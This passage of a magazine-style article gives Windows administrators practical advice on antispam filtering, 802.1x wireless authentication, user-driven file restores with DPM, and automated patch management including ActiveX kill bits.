As seductive as the idea of a Bayesian-based,
"self-learning" antispam solution is, I've had
better luck with frequently updated signature-based spam-detection solutions. Like antivirus
solutions, signature-based spam-detection solutions require the vendor to constantly monitor messages, quickly update their signature
database, and just as quickly push the updated
file to their customers. Microsoft Exchange Intelligent Message Filter (IMF) would be a much
better solution if Microsoft updated it more
frequently. I always see a dramatic drop in spam after I install an IMF update, but the amount of
uncaught spam immediately begins to climb.
Other signature-based spam solutions, such as
St. Bernard Software's ePrism, are much more
frequently updated. There are also a number
of antispam services available that relieve you
from installing and maintaining any software by
routing your mail through the antispam service's
servers first.
Perhaps the biggest risk in implementing
an antispam solution is the potential increase
in support calls from users trying to find email
messages that were apparently eaten by the
antispam solution. Any solution that requires
you to get involved when a user needs to
retrieve a false positive is more trouble than
it's worth. My advice is to install only antispam
solutions that make all email identified as
spam easily accessible to the user—preferably
without leaving the email client. As examples,
you can configure both IMF and GFI Software's GFI MailEssentials to put all spam into
the recipient's junk email folder. Even better,
GFI MailEssentials lets you specify a different
folder for each antispam method it supports,
so you can determine which method (e.g.,
Bayesian, SPF, Realtime Blackhole List—RBL)
is responsible for misclassifying a good email
message by the folder in which it ends up.
Wi-Fi Security
Most organizations I run into are still using
Wired Equivalent Privacy (WEP) standard or
Wi-Fi Protected Access (WPA) pre-shared keys
to secure their wireless LANs (WLANs). WEP
isn't secure no matter how strong your shared
key is due to vulnerabilities in the protocol
and associated algorithms. WPA and WPA2
pre-shared keys are secure only if they are at
least 22 characters long and drawn from a large
character set. Long shared keys, though, are an
annoying, time-sapping problem for IT staff
and users because of all the management and
security issues that arise. Users can't remember them, so you're constantly asked for the
key, and frighteningly few users seem capable
of typing more than a few characters correctly
in sequence. Whenever a new computer is
commissioned or a contractor comes in, you
must get them access to the WLAN. And what
happens if a pre-shared key is compromised?
The solution is elimination. Get rid of WPA
with pre-shared keys (WPA-PSK). No, not
WPA altogether—just the PSK part. Implement
802.1x in place of pre-shared key authentication. With 802.1x, you configure your Access
Points (APs) to interface with Active Directory
(AD) via Remote Authentication Dial-In User
Service (RADIUS) to authenticate users and
computers based on their AD credentials. You
have to install Internet Authentication Services
(IAS) on one of your Windows servers, such
as a domain controller (DC); IAS is Windows'
built-in RADIUS server. After installing IAS, you
introduce the APs and IAS to each other with
some simple configuration settings, and in no
time your Windows wireless clients will begin
authenticating to your WLAN by using either
the computer's or the user's credentials.
By applying a few Group Policy settings, you
can make the authentication process transparent to users of computers that belong to your
domain. Outside users such as contractors and
consultants that need access to your WLAN simply need to enter the user name and password
of an AD account that you provide them. IAS
allows you to limit access to WLAN and internal
wired networks based on group membership,
which allows you to restrict external consultants to Internet-only access, for instance. For
detailed directions for implementing 802.1x on
your WLAN, see the Windows IT Security article
"Reaping the Benefits of WPA and PEAP," June
2006, InstantDoc ID 50105. By replacing WPAPSK with 802.1x, you leverage the user accounts
you already manage in AD and eliminate the
headaches of pre-shared keys.
Restoring Files
Backup and recovery is very much a part of
information security, even if it isn't the first
thing you think of. There's nothing more
annoying than being close to a new high score
on your favorite computer game when an
inconsiderate user calls up whining about a file
he needs restored. While mourning your dead
game avatar, you must rouse from the comfortable environs of your cubicle, find the appropriate tape, restore the file, inform the user, and
repeat the process when he decides he really
needed a version from a week earlier.
Stop the insanity! Get Microsoft System
Center Data Protection Manager (DPM), and
put users in control of their own restores—right
from Windows Explorer. After you install a
DPM server and the associated agent on your
file server, DPM periodically takes snapshots
of your server. It efficiently stores multiple versions of each file in its online Microsoft SQL
Server database. After you push out a necessary hotfix explained in the Microsoft article "How
to use the End User Recovery functionality
of Data Protection Manager in Windows XP"
(http://support.microsoft.com/kb/895536) to
your Windows XP clients, users will be able to
browse available backup versions of any file
on the server directly from Windows Explorer. To facilitate offsite backups of your data, DPM
lets you back up shadow copies of your file
servers from the DPM database, giving you a
disk-to-disk-to-tape backup scenario. To learn
more about DPM, go to http://www.microsoft.com
Patch Management
Patch Tuesday is many administrators' least
favorite day of the month. And zero-day vulnerabilities are rearing their ugly heads more
frequently between Patch Tuesdays. I have
three recommendations for making your
patch-management effort less of a nightmare:
- Life is too short to push out patches manually. Implement Windows Server Update
Services (WSUS) or another automated
patch-management solution. WSUS is free,
but many excellent ISV offerings go beyond
WSUS's functionality, providing broader
platform and application support and better manageability, including those from St.
Bernard Software, PatchLink, BigFix, Shavlik
Technologies, and ScriptLogic.
- Many administrators are reluctant to push
out a patch without testing it, but testing is time-consuming and annoying. In addition, the user community usually identifies
defective patches soon after their release.
Organizations with a small IT staff might
consider just sitting on patches a couple of
days and monitoring for any advisories or
revisions from Microsoft, then deploying
them without testing.
- An especially annoying type of vulnerability
is that for which no patch is available—zeroday vulnerabilities. Most zero-day exploits
are related either to a specific file type (e.g., .doc, .xls, .ppt, .bmp, .png) or to a Microsoft Internet Explorer (IE) ActiveX object. More
and more antivirus vendors quickly release
signature updates for file-format exploits
even though they aren't, strictly speaking,
viruses. If you cover your file-borne vectors
(principally email attachments and Web
downloads) with multiple antivirus engines, you'll often be protected against these fileborne zero-day exploits well ahead of patch
availability. The easiest way to address
ActiveX-related vulnerabilities is to set the
kill bit on the ActiveX control. I've created
an administrative template that you can use
with Group Policy to automatically set the
kill bit for an ActiveX control on thousands
of computers in a short time. The template
and a video demonstrating how to set it up
can be found at http://www.ultimatewindowssecurity.com/killbit.asp.
Take Action
In the case of many security annoyances,
the key is to automate or implement newer
technologies, but often such projects are put
off because of the initial setup involved or
the purchase costs. However, failing to solve
problems and automate tasks leads to a less
and less productive IT department that moves
in slower and slower motion, dragged down by
outdated, manual procedures. The IT department that succeeds in climbing the steep,
initial curve to eliminating IT headaches such
as those in this article will reap the benefits in
the long run. A few weekends at the office now
can save you many evenings and weekends in
the future.
End of Article
)
afotakel June 11, 2008 (Article Rating: